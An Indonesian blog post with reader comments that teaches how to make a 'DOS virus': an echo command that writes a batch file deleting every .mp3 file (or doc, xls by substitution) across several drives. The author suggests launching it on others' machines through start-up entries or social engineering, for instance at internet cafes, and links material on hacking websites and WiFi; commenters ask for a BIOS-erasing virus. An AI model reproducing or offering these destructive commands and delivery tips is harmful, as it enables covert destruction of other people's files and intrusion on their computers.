Trik Membuat Virus DOS Versi 2

Membahas masalah virus maker sebenarnya takut-takut asyik.takutnya komputer sendiri jadi sasaran jadi senjata makan tuan deh.seperti yang saya alami pada waktu membuat virus dengan VB 6.0,mau membuat virus kok malah diserang virus duluan.hehehe..
Asyiknya bisa membuat virus tuh kadang-kadang ada arti tersendiri,ada yang suka isengin komputer orang lain,dsb.
Pagi kerja,sore kuliah sampe malam masih nyempet-nyempetin aja memposting blog.yah..mau gimana lagi kalo udah hobinya blogging,dibela-belain begadang meskipun paginya kerja.yang penting hatiku senaaanggg…!!!.:D
Setelah googling kebeberapa situs akhirnya saya mendapatkan trik baru untuk membuat virus DOS dengan gampang dan instant.Sebenarnya saya kurang begitu tertarik dalam bab ini,karena maksudnya adalah merusak.tapi saya hanya ingin berbagi kepada semua yang ingin tahu tentang membuat virus dengan bahasa pemrograman DOS.trik ini sangat simple dan sangat sederhana dan mudah sekali dipraktikkan.tidak membutuhkan banyak script,seperti VB.kalo cuma ingin menghapus file mp3,doc,xls dll.ga usah ribet ribet bikin listing yang panjang.cukup mengetikkan beberapa code/sintaks dari DOS dan hasilnyapun cukup sadisss.contoh dibawah ini adalah membuat virus mp3.langkah pertama bukalah jendela DOS anda dan ketikkan.

echo for %%p in (d:\) do del *.mp3 %0 %%p:>virusdos.bat kemudian tekan enter.seperti gambar dibawah ini:

Pada (d:\) adalah lokasi dimana kita menempatkan file virus berada.terserah anda mau diletakkan di c:\,d:\,f:\ dsb.dan andapun bisa meletakkan satu virus ini sekaligus dibeberapa drive lainnya dengan mengetikkan:

echo for %%p in (c d e f g) do del *.mp3 %0 %%p:>virusdos.bat

Dan andapun bisa merubah target yang diinginkan misalnya anda ingin membuat virus untuk menyerang file doc,cukup ganti mp3 dengan doc.Virus ini masih dalam kondisi off.anda bisa menjalankannya dengan menggunakan start-up atau social engineering.Ingat!! untuk menguji cobanya gunakan komputer lain,misalnya diwarnet atau tempat2 lain.hati-hati virus ini langsung menghapus tanpa jejak,sekali beraksi tamatlah sudah….hehhe:D.Selamat berkreasi,Selamat mencoba dan semoga berhasil..:)

Free E-book Triks

1.Hacking website dan Wifi
2.Membuat virus macro

Free Tool Virus Making

3.Turbo BasicV1.0

Bookmark and Share

Trik Membuat Virus DOS Versi 2

14 thoughts on “Trik Membuat Virus DOS Versi 2

    1. salam, saya suka dengan ulasan dan gaya penulisan anda, edukatif dan sarat ilmu dunia komputer, semoga saya bisa mencontoh anda dalam memberikan pemikiran dan saran bagi sesama, semoga sukses selalu.
      @ smadav juni 2010.

    1. mksih tu jg aq dpt dr webmaster kok..hehhee
      iya ht2 vrus cinta sdng meraja lela…wkwkwkk…
      Blognya bagus kang..udh aq psng linknya..

  1. deni says:

    gan admin,ada virus yang buat hapus bios komputer? kalau ada kasih tahu caranya, atau lewat email

  2. dodi says:

    bang ngaktifin nya gimana ane gk tau star up yng kya gimana

    kirimin bang ke email ane

Comments are closed.